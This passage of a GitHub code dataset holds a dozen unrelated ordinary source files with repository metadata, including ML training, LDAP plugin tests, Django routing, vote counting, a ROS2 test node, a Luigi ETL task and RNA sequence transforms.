torch.cat(all_features).cpu().numpy(), torch.cat(all_labels).cpu().numpy()\r\n\r\nif not os.path.isfile(features_labels_file):\r\n # Calculate the image features\r\n train_features, train_labels = get_features(train)\r\n test_features, test_labels = get_features(test)\r\n\r\n # Save image features\r\n features_labels = {\"train_features\": train_features, \r\n \"train_labels\": train_labels, \r\n \"test_features\": test_features, \r\n \"test_labels\": test_labels}\r\n with open(features_labels_file, \"wb\") as f:\r\n pickle.dump(features_labels, f)\r\nelse:\r\n # Load image features\r\n with open(features_labels_file, 
\"rb\") as f:\r\n features_labels = pickle.load(f)\r\n train_features = features_labels[\"train_features\"]\r\n train_labels = features_labels[\"train_labels\"]\r\n test_features = features_labels[\"test_features\"]\r\n test_labels = features_labels[\"test_labels\"]\r\n\r\nif classifier_model == \"logistic regression\" and not os.path.isfile(model_paths[classifier_model]):\r\n # Perform logistic regression\r\n classifier = LogisticRegression(random_state=0, C=0.316, max_iter=1000, verbose=1)\r\n classifier.fit(train_features, train_labels)\r\n with open(model_paths[classifier_model], \"wb\") as f:\r\n pickle.dump(classifier, f)\r\nelif classifier_model == \"mlp\" and not os.path.isfile(model_paths[classifier_model]):\r\n # Perform MLP\r\n input_feature_size = train_features.shape[1]\r\n classifier = MLPClassifier(random_state=0, max_iter=1000, hidden_layer_sizes=(int(input_feature_size/2),), verbose=1)\r\n classifier.fit(train_features, train_labels)\r\n with open(model_paths[classifier_model], \"wb\") as f:\r\n pickle.dump(classifier, f)\r\nelse:\r\n model_path = model_paths[classifier_model]\r\n print(\"Loading pretrained model from %s\" % (model_path))\r\n with open(model_path, 'rb') as f:\r\n classifier = pickle.load(f)\r\n\r\n# # Evaluate using the logistic regression classifier\r\npredictions = classifier.predict(test_features)\r\nprint(classification_report(test_labels, predictions, target_names=classes))\r\naccuracy = np.mean((test_labels == predictions).astype(np.float)) * 100.\r\nprint(f\"Test Accuracy = {accuracy:.3f}\")","repo_name":"robertocarlosjuan/Text-Region-Grouping","sub_path":"img_classifier/CLIP/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"13404510171","text":"import pytest\nfrom lib389.tasks import *\nfrom lib389.utils import *\nfrom lib389.topologies import topology_st\n\nfrom lib389._constants import SUFFIX, DEFAULT_SUFFIX, PLUGIN_MEMBER_OF, DN_PLUGIN\n\nSCOPE_IN_CN = 'in'\nSCOPE_OUT_CN = 'out'\nSCOPE_IN_DN = 'cn=%s,%s' % (SCOPE_IN_CN, SUFFIX)\nSCOPE_OUT_DN = 'cn=%s,%s' % (SCOPE_OUT_CN, SUFFIX)\n\nPROVISIONING_CN = \"provisioning\"\nPROVISIONING_DN = \"cn=%s,%s\" % (PROVISIONING_CN, SCOPE_IN_DN)\n\n# Skip on older versions\npytestmark = [pytest.mark.tier2,\n pytest.mark.skipif(ds_is_older('1.3.3'), reason=\"Not implemented\")]\n\nACTIVE_CN = \"accounts\"\nSTAGE_CN = \"staged users\"\nDELETE_CN = \"deleted users\"\nACTIVE_DN = \"cn=%s,%s\" % (ACTIVE_CN, SCOPE_IN_DN)\nSTAGE_DN = \"cn=%s,%s\" % (STAGE_CN, PROVISIONING_DN)\nDELETE_DN = \"cn=%s,%s\" % (DELETE_CN, PROVISIONING_DN)\n\nSTAGE_USER_CN = \"stage guy\"\nSTAGE_USER_DN = \"cn=%s,%s\" % (STAGE_USER_CN, STAGE_DN)\n\nACTIVE_USER_CN = \"active guy\"\nACTIVE_USER_DN = \"cn=%s,%s\" % (ACTIVE_USER_CN, ACTIVE_DN)\n\nOUT_USER_CN = \"out guy\"\nOUT_USER_DN = \"cn=%s,%s\" % (OUT_USER_CN, SCOPE_OUT_DN)\n\nSTAGE_GROUP_CN = \"stage group\"\nSTAGE_GROUP_DN = \"cn=%s,%s\" % (STAGE_GROUP_CN, STAGE_DN)\n\nACTIVE_GROUP_CN = \"active group\"\nACTIVE_GROUP_DN = \"cn=%s,%s\" % (ACTIVE_GROUP_CN, ACTIVE_DN)\n\nOUT_GROUP_CN = \"out group\"\nOUT_GROUP_DN = \"cn=%s,%s\" % (OUT_GROUP_CN, SCOPE_OUT_DN)\n\nlogging.getLogger(__name__).setLevel(logging.DEBUG)\nlog = logging.getLogger(__name__)\n\n\ndef _header(topology_st, label):\n topology_st.standalone.log.info(\"\\n\\n###############################################\")\n topology_st.standalone.log.info(\"#######\")\n 
topology_st.standalone.log.info(\"####### %s\" % label)\n topology_st.standalone.log.info(\"#######\")\n topology_st.standalone.log.info(\"###############################################\")\n\n\ndef _add_user(topology_st, type='active'):\n if type == 'active':\n topology_st.standalone.add_s(Entry((ACTIVE_USER_DN, {\n 'objectclass': \"top person inetuser\".split(),\n 'sn': ACTIVE_USER_CN,\n 'cn': ACTIVE_USER_CN})))\n elif type == 'stage':\n topology_st.standalone.add_s(Entry((STAGE_USER_DN, {\n 'objectclass': \"top person inetuser\".split(),\n 'sn': STAGE_USER_CN,\n 'cn': STAGE_USER_CN})))\n else:\n topology_st.standalone.add_s(Entry((OUT_USER_DN, {\n 'objectclass': \"top person inetuser\".split(),\n 'sn': OUT_USER_CN,\n 'cn': OUT_USER_CN})))\n\n\ndef _find_memberof(topology_st, user_dn=None, group_dn=None, find_result=True):\n assert (topology_st)\n assert (user_dn)\n assert (group_dn)\n ent = topology_st.standalone.getEntry(user_dn, ldap.SCOPE_BASE, \"(objectclass=*)\", ['memberof'])\n found = False\n if ent.hasAttr('memberof'):\n\n for val in ent.getValues('memberof'):\n topology_st.standalone.log.info(\"!!!!!!! %s: memberof->%s\" % (user_dn, val))\n if val == group_dn:\n found = True\n break\n\n if find_result:\n assert (found)\n else:\n assert (not found)\n\n\ndef _find_member(topology_st, user_dn=None, group_dn=None, find_result=True):\n assert (topology_st)\n assert (user_dn)\n assert (group_dn)\n ent = topology_st.standalone.getEntry(group_dn, ldap.SCOPE_BASE, \"(objectclass=*)\", ['member'])\n found = False\n if ent.hasAttr('member'):\n\n for val in ent.getValues('member'):\n topology_st.standalone.log.info(\"!!!!!!! %s: member ->%s\" % (group_dn, val))\n if ensure_str(val) == user_dn:\n found = True\n break\n\n if find_result:\n assert (found)\n else:\n assert (not found)\n\n\ndef _modrdn_entry(topology_st=None, entry_dn=None, new_rdn=None, del_old=0, new_superior=None):\n assert topology_st != None\n assert entry_dn != None\n assert new_rdn != None\n\n topology_st.standalone.log.info(\"\\n\\n######################### MODRDN %s ######################\\n\" % new_rdn)\n if new_superior:\n topology_st.standalone.rename_s(entry_dn, new_rdn, newsuperior=new_superior, delold=del_old)\n else:\n topology_st.standalone.rename_s(entry_dn, new_rdn, delold=del_old)\n\n\ndef _check_memberof(topology_st=None, action=None, user_dn=None, group_dn=None, find_result=None):\n assert (topology_st)\n assert (user_dn)\n assert (group_dn)\n if action == ldap.MOD_ADD:\n txt = 'add'\n elif action == ldap.MOD_DELETE:\n txt = 'delete'\n else:\n txt = 'replace'\n topology_st.standalone.log.info('\\n%s entry %s' % (txt, user_dn))\n topology_st.standalone.log.info('to group %s' % group_dn)\n\n topology_st.standalone.modify_s(group_dn, [(action, 'member', ensure_bytes(user_dn))])\n time.sleep(1)\n _find_memberof(topology_st, user_dn=user_dn, group_dn=group_dn, find_result=find_result)\n\n\ndef test_ticket47829_init(topology_st):\n topology_st.standalone.add_s(Entry((SCOPE_IN_DN, {\n 'objectclass': \"top nscontainer\".split(),\n 'cn': SCOPE_IN_DN})))\n topology_st.standalone.add_s(Entry((SCOPE_OUT_DN, {\n 'objectclass': \"top nscontainer\".split(),\n 'cn': SCOPE_OUT_DN})))\n topology_st.standalone.add_s(Entry((PROVISIONING_DN, {\n 'objectclass': \"top nscontainer\".split(),\n 'cn': PROVISIONING_CN})))\n topology_st.standalone.add_s(Entry((ACTIVE_DN, {\n 'objectclass': \"top nscontainer\".split(),\n 'cn': ACTIVE_CN})))\n topology_st.standalone.add_s(Entry((STAGE_DN, {\n 'objectclass': \"top 
nscontainer\".split(),\n 'cn': STAGE_DN})))\n topology_st.standalone.add_s(Entry((DELETE_DN, {\n 'objectclass': \"top nscontainer\".split(),\n 'cn': DELETE_CN})))\n\n # add groups\n topology_st.standalone.add_s(Entry((ACTIVE_GROUP_DN, {\n 'objectclass': \"top groupOfNames\".split(),\n 'cn': ACTIVE_GROUP_CN})))\n topology_st.standalone.add_s(Entry((STAGE_GROUP_DN, {\n 'objectclass': \"top groupOfNames\".split(),\n 'cn': STAGE_GROUP_CN})))\n topology_st.standalone.add_s(Entry((OUT_GROUP_DN, {\n 'objectclass': \"top groupOfNames\".split(),\n 'cn': OUT_GROUP_CN})))\n\n # add users\n _add_user(topology_st, 'active')\n _add_user(topology_st, 'stage')\n _add_user(topology_st, 'out')\n\n # enable memberof of with scope account\n topology_st.standalone.plugins.enable(name=PLUGIN_MEMBER_OF)\n dn = \"cn=%s,%s\" % (PLUGIN_MEMBER_OF, DN_PLUGIN)\n topology_st.standalone.modify_s(dn, [(ldap.MOD_REPLACE, 'memberOfEntryScope', ensure_bytes(ACTIVE_DN))])\n\n topology_st.standalone.restart(timeout=10)\n\n\ndef test_ticket47829_mod_stage_user_modrdn_stage_user_1(topology_st):\n _header(topology_st, 'add an Stage user to a Active group. Then move Stage user to Stage')\n\n old_stage_user_dn = STAGE_USER_DN\n old_stage_user_rdn = \"cn=%s\" % STAGE_USER_CN\n new_stage_user_rdn = \"cn=x%s\" % STAGE_USER_CN\n new_stage_user_dn = \"%s,%s\" % (new_stage_user_rdn, STAGE_DN)\n\n # add Stage user to active group\n _check_memberof(topology_st, action=ldap.MOD_ADD, user_dn=old_stage_user_dn, group_dn=ACTIVE_GROUP_DN,\n find_result=False)\n _find_member(topology_st, user_dn=old_stage_user_dn, group_dn=ACTIVE_GROUP_DN, find_result=True)\n\n # move the Stage entry to Stage, expect no 'member' and 'memberof'\n _modrdn_entry(topology_st, entry_dn=old_stage_user_dn, new_rdn=new_stage_user_rdn, new_superior=STAGE_DN)\n _find_memberof(topology_st, user_dn=new_stage_user_dn, group_dn=ACTIVE_GROUP_DN, find_result=False)\n _find_member(topology_st, user_dn=new_stage_user_dn, group_dn=ACTIVE_GROUP_DN, find_result=False)\n\n\nif __name__ == '__main__':\n # Run isolated\n # -s for DEBUG mode\n CURRENT_FILE = os.path.realpath(__file__)\n pytest.main(\"-s %s\" % CURRENT_FILE)\n","repo_name":"389ds/389-ds-base","sub_path":"dirsrvtests/tests/tickets/ticket47833_test.py","file_name":"ticket47833_test.py","file_ext":"py","file_size_in_byte":7740,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"31"} +{"seq_id":"5692185929","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework_swagger.views import get_swagger_view\n\nschema_view = get_swagger_view(title=\"API Documentation\")\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n path(\"api/docs/\", schema_view),\n path(\"companies/\", include(\"companies.urls\")),\n path(\"employees/\", include(\"employees.urls\")),\n path(\"devices/\", include(\"devices.urls\")),\n path(\n \"api/\", include(\"devices.api_urls\")\n ), # Include the API URLs from the 'devices' app\n]\n","repo_name":"Adnanrobi/Track_corpo_asset","sub_path":"corporate_assets_tracker/corporate_assets_tracker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39665653916","text":"\n#define the variables\ntotal_votes = 0\nrow_count = 0 \nhighest_votes = 0\nwinning_candidate = \"\"\nwinning_percentage = 0.00\n\n#lists/dictionaries\nvotes_by_candidate = {} #output ex: Charles Stockham: 23.049%\nkeys = [] 
#unique candidates\nvalues = 0 #variable containing sum of votes by candidate\nfound = False\n\n#imports\nimport csv\nimport os\nwith open(\"PyPoll/Resources/election_data.csv\") as election_data:\n    reader = csv.reader(election_data)\n    header = next(reader)\n\n\n    for row in reader:\n        unique_candidates = row[2] #candidate name for this ballot row\n        total_votes = total_votes + 1\n        if unique_candidates not in keys:\n            keys.append(unique_candidates) \n            votes_by_candidate[unique_candidates] = 0 #tracker begins\n        votes_by_candidate[unique_candidates] = votes_by_candidate[unique_candidates] + 1 #increment the tally for this candidate\n    print(\"Election Results\")\n    print(\"-------------------------\") \n    print(f\"Total Votes: {total_votes}\")\n    print(\"-------------------------\") \n\nanalysis_file_path = os.path.join('PyPoll','analysis','analysis.txt')\n\nwith open(analysis_file_path, 'w') as file:\n    writer = csv.writer(file)\n    writer.writerow([\"Election Results\"])\n    writer.writerow([\"-------------------------\"]) \n    writer.writerow([f\"Total Votes: {total_votes}\"]) \n    writer.writerow([\"-------------------------\"]) \n\n    for candidate, vote_count in votes_by_candidate.items():\n        vote_winner = vote_count # number of votes received by this candidate\n        vote_percentage = float(vote_winner)/float(total_votes)\n        if vote_winner > highest_votes: \n            highest_votes = vote_winner\n            winning_candidate = candidate\n            winning_percentage = vote_percentage\n        print(f\"{candidate}: {vote_percentage:.3%} ({vote_winner})\")\n        \n        writer.writerow([f\"{candidate}: {vote_percentage:.3%} ({vote_winner})\"])\n    writer.writerow([\"-------------------------\"]) \n    writer.writerow([f\"Winner: {winning_candidate}\"])\n    writer.writerow([\"-------------------------\"]) \n\nprint(\"-------------------------\") \nprint(f\"Winner: {winning_candidate}\")\nprint(\"-------------------------\") \n\n\n","repo_name":"ericlsimon/python-challenge","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41694067156","text":"# -*- coding: utf-8 -*-\n\"\"\"\n    CreatedDate: 2022-07-19\n    FileName   : calcEquation.py\n    Author     : Honghe\n    Description: 399. 
Evaluate Division https://leetcode.cn/problems/evaluate-division/\n\"\"\"\nfrom typing import List\nfrom collections import defaultdict\n\n\nclass Solution:\n    def calcEquation(self, equations: List[List[str]], values: List[float], queries: List[List[str]]) -> List[float]:\n        \"\"\"\n        DFS: just build the graph and search it; note that the edges are directed (each pair is stored with both weights).\n        :param equations:\n        :param values:\n        :param queries:\n        :return:\n        \"\"\"\n        num_values = {}\n        graph = defaultdict(list)\n\n        for index,equation in enumerate(equations):\n            x,y = equation\n            graph[x].append(y)\n            graph[y].append(x)\n            num_values[(x,y)]=values[index]\n            num_values[(y,x)] = round(1/values[index],5)\n\n        res = []\n        for query in queries:\n            x,y = query\n            if x not in graph or y not in graph:\n                res.append(-1.0)\n                continue\n            if x==y:\n                res.append(1.0)\n                continue\n            path = [x]\n            visited = set([x])\n            tmp = self.dfs(graph,path,y,x,visited)\n            if not tmp:\n                res.append(-1.0)\n            else:\n                value = 1.0\n                for i in range(len(path)-1):\n                    value*=num_values.get((path[i],path[i+1]))\n                res.append(value)\n        return res\n\n    def dfs(self,graph,path,target,node,visited):\n        for i in graph.get(node):\n            if i in visited:\n                continue\n            visited.add(i)\n            path.append(i)\n            if i==target:\n                return True\n            res = self.dfs(graph,path,target,i,visited)\n            if res:\n                return True\n            path.pop()\n        return False\n\n    def calcEquation2(self, equations: List[List[str]], values: List[float], queries: List[List[str]]) -> List[float]:\n        \"\"\"\n        Weighted union-find; note the weight updates when merging sets.\n        :param equations:\n        :param values:\n        :param queries:\n        :return:\n        \"\"\"\n        node_ids = {}\n        count = 0\n        parents = list(range(len(equations)*2))\n        size_list = [1.0] * len(equations)*2\n        for index,equation in enumerate(equations):\n            x, y = equation\n            if x not in node_ids:\n                node_ids[x] = count\n                count+=1\n            if y not in node_ids:\n                node_ids[y] = count\n                count += 1\n            self.union(node_ids[x],node_ids[y],parents,size_list,values[index])\n\n        res = []\n        for query in queries:\n            x, y = query\n            if x not in node_ids or y not in node_ids:\n                res.append(-1.0)\n                continue\n            if x==y:\n                res.append(1.0)\n                continue\n            father_x = self.find(node_ids[x],parents,size_list)\n            father_y = self.find(node_ids[y], parents, size_list)\n            if father_x!=father_y:\n                res.append(-1.0)\n            else:\n                res.append(size_list[node_ids[x]]/size_list[node_ids[y]])\n        return res\n\n    def find(self, node, parents, size_list):\n        father = parents[node]\n        if father!=node:\n            parents[node] = self.find(father,parents,size_list)\n            size_list[node] *= size_list[father]  # note the weight/distance update\n        return parents[node]\n\n    def union(self,node_a,node_b, parents, size_list,weight):\n        father_a = self.find(node_a, parents, size_list)\n        father_b = self.find(node_b, parents, size_list)\n        if father_a==father_b:\n            return\n        parents[father_a] = father_b\n        size_list[father_a] = size_list[node_b]*weight/size_list[node_a]  # note the weight/distance update\n\nif __name__ == '__main__':\n    equations = [[\"a\", \"b\"], [\"e\", \"f\"], [\"b\", \"e\"]]\n    values = [3.4, 1.4, 2.3]\n    queries = [[\"a\", \"f\"]]\n    sol = Solution()\n    print(sol.calcEquation2(equations,values,queries))\n\n\n\n\n","repo_name":"whan2013xh/leetcode300","sub_path":"src/offer_2/day38-图/calcEquation.py","file_name":"calcEquation.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24388899208","text":"import numpy as np\nimport cv2\n\nimg = np.full(shape=(300, 400, 3), fill_value=[0,128,128], dtype=np.uint8)\n\n# Example: zebra-crossing stripes\nfor x in range(0, img.shape[1], 20): # from 0 to the image width in steps of 20\n    img[:, x: 
x+10] = [0,0,0]\n\ncv2.imshow(\"Examples\", img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"Brandsatz/Audio-Video-Programmierung","sub_path":"Hausaufgaben/Video_1/openCV/opencv_getting_started.py","file_name":"opencv_getting_started.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26297889990","text":"import rclpy\nfrom rclpy.node import Node\n\nfrom std_msgs.msg import Int8, Int16\nfrom sensor_msgs.msg import Imu\n\nfrom tf_transformations import euler_from_quaternion\nfrom math import pi\n\nclass SquareTest(Node):\n\n    def __init__(self):\n        # ROS stuff\n        super().__init__('square_test')\n\n        self.yaw_pub = self.create_publisher(Int16, '/target/yaw', 10)\n        self.surge_pub = self.create_publisher(Int8, '/thrusters/surge', 10)\n\n        self.yaw_thrust_sub = self.create_subscription(Int8, '/thrusters/yaw', self.yaw_cb, 10)\n\n        self.declare_parameter('surge_time', 5.0)\n        self.surge_time = self.get_parameter('surge_time').get_parameter_value().double_value\n        self.declare_parameter('surge_speed', 20)\n        self.surge_speed = self.get_parameter('surge_speed').get_parameter_value().integer_value\n\n        self.declare_parameter('turns', [90])\n        self.turns = self.get_parameter('turns').get_parameter_value().integer_array_value \n\n        self.check = self.create_timer(0.5, self.check_timer) \n\n        self.heading = 0\n        self.datum = None\n        self.turning = False\n        self.executed = 0\n        self.effort = 0\n\n        # Start by surging\n        self.surge()\n\n\n    def surge(self):\n        self.get_logger().info('Surge')\n\n        surge = Int8()\n        surge.data = self.surge_speed\n        self.surge_pub.publish(surge)\n\n        self.surge_timer = self.create_timer(self.surge_time, self.surge_timer_cb)\n\n    def surge_timer_cb(self):\n        self.get_logger().info('Stop')\n        \n        self.destroy_timer(self.surge_timer)\n\n        if self.executed < len(self.turns):\n            self.turn()\n        else:\n            self.get_logger().info('Finished')\n\n        stop = Int8()\n        stop.data = 0\n        self.surge_pub.publish(stop)\n\n\n    def turn(self):\n        self.get_logger().info('Turning')\n\n        self.heading += self.turns[self.executed] \n        # Convert to +/- 180 - might break if given > 360 rotation, don't do that\n        if self.heading > 180:\n            self.heading -= 360\n        elif self.heading < -180:\n            self.heading += 360\n\n        cmd = Int16()\n        cmd.data = self.heading\n        self.yaw_pub.publish(cmd)\n\n        self.turning = True \n        self.executed += 1\n\n\n    def yaw_cb(self, msg):\n        self.effort = msg.data\n        \n        \n    def check_timer(self):\n        if self.turning:\n            if abs(self.effort) <= 1:\n                self.turning = False\n                self.surge()\n\n\n\n\ndef main(args=None):\n    rclpy.init(args=args)\n\n    square_test = SquareTest()\n    rclpy.spin(square_test)\n\n    square_test.destroy_node()\n    rclpy.shutdown()\n\nif __name__ == '__main__':\n    main()","repo_name":"robbal46/usv_fyp","sub_path":"usv_test/usv_test/square_test.py","file_name":"square_test.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72664346328","text":"import luigi\nimport json\nfrom extractTask import ExtractTask\n\nclass TransformTask(luigi.Task):\n    version = luigi.IntParameter(default=1)\n\n    def requires(self):\n        return ExtractTask(version=self.version)\n\n    def run(self):\n\n        # Load the extracted data\n        with self.input().open('r') as input_file:\n            extracted_data = json.load(input_file)\n\n        # Directly pass on the data that doesn't need to be transformed\n        userDim = extracted_data[\"employee\"]\n        bookDim = 
extracted_data[\"book\"]\n keywordDim = extracted_data[\"keyword\"]\n bookKeywordFact = extracted_data[\"keyword_books\"]\n reviewFact = extracted_data[\"review\"]\n \n # Define variables for data that needs to be transformed\n loans = extracted_data[\"loan\"]\n copies = extracted_data[\"copy\"]\n\n # Helper variable for the mapping from copy to book to eliminate copies in the target db\n copy_to_book = {}\n for loan in loans:\n copy_id = loan[3]\n for copy in copies:\n if(copy_id == copy[0]):\n book_id = copy[1]\n copy_to_book[copy_id] = book_id\n\n # Create loanFact by combining loan and book information\n loanFact = []\n for loan in loans:\n\n loan_fact_entry = {\n 'loan_id': loan[0],\n 'loan_date': loan[1],\n 'return_date': loan[2],\n 'book_id': copy_to_book[loan[3]],\n 'employee_id': loan[4]\n }\n loanFact.append(loan_fact_entry)\n\n # Store transformed data in a dictionary\n transformed_data = {\n 'User_DIM': userDim,\n 'Book_DIM': bookDim,\n 'Keyword_DIM': keywordDim,\n 'Book_Keyword_FACT': bookKeywordFact,\n 'Review_FACT' : reviewFact,\n 'Loan_FACT': loanFact\n }\n\n # Save the extracted data as a JSON file\n with self.output().open('w') as output_file:\n json.dump(transformed_data, output_file)\n\n def output(self):\n filename = f'transformed_data_v{self.version}.json'\n return luigi.LocalTarget(filename)","repo_name":"szasadny/Luigi-ETL-Pipeline","sub_path":"transformTask.py","file_name":"transformTask.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28584903607","text":"# encoding: utf-8\n\"\"\"\n@author: chenjiayang\n@contact: chenjiayang@163.com\n\"\"\"\n\nimport sys\nimport collections\nimport random\nimport torch\nimport numpy as np\n\n\nif sys.version_info < (3, 3):\n Sequence = collections.Sequence\n Iterable = collections.Iterable\nelse:\n Sequence = collections.abc.Sequence\n Iterable = collections.abc.Iterable\n\n\nclass Compose(object):\n \"\"\"Composes several transforms together.\n\n Args:\n transforms (list of ``Transform`` objects): list of transforms to compose.\n\n Example:\n >>> transforms.Compose([\n >>> transforms.CenterCrop(10),\n >>> transforms.ToTensor(),\n >>> ])\n \"\"\"\n\n def __init__(self, transforms):\n self.transforms = transforms\n\n def __call__(self, img):\n for t in self.transforms:\n img = t(img)\n return img\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n for t in self.transforms:\n format_string += '\\n'\n format_string += ' {0}'.format(t)\n format_string += '\\n)'\n return format_string\n\nclass ToTensor(object):\n \"\"\"Convert a ``PIL Image`` or ``numpy.ndarray`` to tensor.\n\n Converts a PIL Image or numpy.ndarray (H x W x C) in the range\n [0, 255] to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 1.0]\n if the PIL Image belongs to one of the modes (L, LA, P, I, F, RGB, YCbCr, RGBA, CMYK, 1)\n or if the numpy.ndarray has dtype = np.uint8\n\n In the other cases, tensors are returned without scaling.\n \"\"\"\n\n def __call__(self, sequence):\n \"\"\"\n Args:\n pic (PIL Image or numpy.ndarray): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n return torch.Tensor(sequence)\n\n def __repr__(self):\n return self.__class__.__name__ + '()'\n\n\nclass Encode(object):\n \"\"\"\n \"DNA Sequence Classification by Convolutional Neural Network\"\n Article in Journal of Biomedical Science and Engineering · January 2016\n DOI: 10.4236/jbise.2016.95021\n \"\"\"\n def 
__init__(self):\n self.element_vector_length = 4 # one-hot A U G C\n self.word_length = 3 # n elements -> a word\n self.region_size = 4 # n word -> a column\n\n # map word into a scalar\n temp1 = np.array(range(self.element_vector_length)).reshape((self.element_vector_length,1))\n temp2 = np.array([np.power(self.element_vector_length, i) for i in range(self.word_length)]).reshape((1, self.word_length))\n\n self.word_encode_table = np.dot(temp1, temp2)\n\n self.vector_encode_table = np.eye(64)\n\n def __call__(self, sequence):\n ori_word_list = []\n # print(sequence.shape)\n num_word = sequence.shape[-1] // self.word_length\n # print(\"num_words:{}\".format(num_word))\n for i in range(num_word):\n word_start = i * self.word_length\n word_end = word_start + self.word_length\n word = sequence[:, word_start:word_end]\n scalar = (self.word_encode_table * word).sum() # (word_length * word_vector) X (word_vector * sequence_length)\n vector = self.vector_encode_table[scalar]\n ori_word_list.append(vector)\n\n new_word_list = []\n for j in range(self.region_size):\n new_word_list.append(np.array(ori_word_list[j:len(ori_word_list) - self.region_size + 1 + j]).T)\n sequence = np.concatenate(new_word_list, axis=0)\n # print(sequence.shape)\n sequence = np.expand_dims(sequence,0) # the channel of 'image'\n\n return sequence\n\n\nclass RandomCrop(object):\n \"\"\"\n input: numpy\n \"\"\"\n def __init__(self, crop_length):\n self.crop_length = crop_length #2000 # 777 ——> encode 256*256\n\n def __call__(self, sequence):\n length = sequence.shape[-1]\n if self.crop_length > 0:\n if self.crop_length < length:\n start = random.randint(0, length - self.crop_length)\n elif self.crop_length == length:\n start = 0\n else:\n raise Exception(\"Crop Length is greater than Sequence Length!\")\n\n sequence = sequence[:, start:start + self.crop_length]\n\n return sequence\n\n\nclass ClampLength(object):\n \"\"\"\n input: numpy V * L\n \"\"\"\n def __init__(self, min=0, max=-1):\n self.min = abs(min) # abs for ensemble prediction\n self.max = abs(max)\n if self.max < self.min and self.min > 0 and self.max > 0:\n raise Exception(\"Set Max less than Min! 
for Length\")\n\n    def __call__(self, sequence):\n        length = sequence.shape[-1]\n        if self.min > length:\n            diff = self.min - length\n            sequence = np.pad(sequence, ((0,0), (0, diff)), \"constant\")\n        elif self.max < length:\n            start = random.randint(0, length - self.max)\n            sequence = sequence[:, start:start + self.max]\n        else:\n            pass\n        return sequence\n","repo_name":"ml4bio/RNA-FM","sub_path":"redevelop/data/transforms/cla_transforms.py","file_name":"cla_transforms.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"31"} +{"seq_id":"34340500407","text":"#!/usr/bin/env python3\n\nfrom hashlib import sha256\n\nimport pytest\n\n\n@pytest.mark.ranges([\n    (1, 2),\n    (2, 10)\n])\n@pytest.mark.message('block duplicates found: [2]')\ndef test_dup_block_check_simple(init_db_and_run_translator):\n    ...\n\n\n@pytest.mark.ranges([\n    (1, 200),\n    (150, 300)\n])\n@pytest.mark.message(f'tx duplicates found: {str([i for i in range(150, 201, 1)])}')\ndef test_dup_block_check_multi(init_db_and_run_translator):\n    ...\n\n\n\ntest_hash = sha256(b'test_tx').hexdigest()\n@pytest.mark.ranges([\n    (110, 120),\n])\n@pytest.mark.txs([\n    {'@raw.block': 110, '@raw.hash': test_hash},\n    {'@raw.block': 115, '@raw.hash': test_hash}\n])\n@pytest.mark.message(f'tx duplicates found: [\\\"{test_hash}\\\"]')\ndef test_dup_tx_check(init_db_and_run_translator):\n    ...\n","repo_name":"telosnetwork/telosevm-translator","sub_path":"tests/test_dup_check.py","file_name":"test_dup_check.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"26121377480","text":"# Import libraries\nimport requests\nimport json\n\nclass WebScraping:\n\tdef __init__(self, settings):\n\t\tself.settings = settings\n\t\tself.api_keys = json.load(open(\"api_keys.json\"))\n\n\n\t# Gets the forecast from the OpenWeatherMap API\n\tdef weather_map_api(self, lonlat):\n\t\tweather_map_api_key = self.api_keys[\"OpenWeatherMap\"]\n\t\t\n\t\tforecast = requests.get(\"https://api.openweathermap.org/data/2.5/weather?lat={}&lon={}&appid={}&units={}\".format(\n\t\t\tlonlat[1],\n\t\t\tlonlat[0],\n\t\t\tweather_map_api_key,\n\t\t\tself.settings[\"measuring_system\"]\n\t\t)).json()\n\n\t\tinfo = \"{} degrees and {}\".format(\n\t\t\tround(forecast[\"main\"][\"temp\"]), forecast[\"weather\"][0][\"description\"])\n\t\treturn info\n\n\n\tdef currency_rates_api(self):\n\t\tcurrency_rates_api_key = self.api_keys[\"ExchangeRateAPI\"]\n\n\t\tcurrency_rates = requests.get(\"http://api.exchangeratesapi.io/v1/latest?access_key={}\".format(\n\t\t\tcurrency_rates_api_key\n\t\t)).json()\n\n\t\treturn currency_rates\n","repo_name":"SuchLuukie/virtual-assistant","sub_path":"server/commands/webScraping.py","file_name":"webScraping.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6704322644","text":"import configparser\nimport os\n\nfrom pymongo import MongoClient\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini') \n\nmyclient = MongoClient(config['DATABASE']['DATABASE_URI'],\n                       int(config['DATABASE']['PORT']))\n    \ndatabase = myclient[config['DATABASE']['DATABASE_NAME']]\ntoken_revoke_db = database[config['DATABASE']['TABLE_TOKEN']] \n \n \nclass TokenRevoke(object):\n    token_revoke = token_revoke_db\n\n    def __init__(self, token): \n        self.token = token \n\n    def add(self):\n        token = {\"jti\": self.token}\n        
